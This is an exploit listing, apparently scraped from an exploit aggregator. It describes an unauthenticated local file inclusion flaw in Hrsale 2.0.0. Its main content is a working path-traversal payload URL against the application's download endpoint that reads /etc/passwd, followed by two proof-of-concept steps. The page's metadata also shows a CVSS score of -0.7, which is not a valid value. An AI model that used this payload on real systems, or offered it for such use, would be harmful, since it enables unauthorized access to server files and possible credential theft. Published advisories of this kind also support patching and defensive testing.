Exploit for Hrsale 2.0.0 Local File Inclusion

Name: Exploit for Hrsale 2.0.0 Local File Inclusion
Rating: 5 (673 reviews)

2020-10-21 | CVSS -0.7

## https://sploitus.com/exploit?id=PACKETSTORM:159654
# Exploit Title: Hrsale 2.0.0 - Local File Inclusion  
# Date: 10/21/2020  
# Exploit Author: Sosecure  
# Vendor Homepage: https://hrsale.com/index.php  
# Version: version 2.0.0  
  
Description:  
This exploit allow you to download any readable file from server with out permission and login session.  
  
Payload :  
https://hrsale/download?type=files&filename=../../../../../../../../etc/passwd  
POC:  
  
1. Access to HRsale application and browse to download path with payload  
2. Get /etc/passwd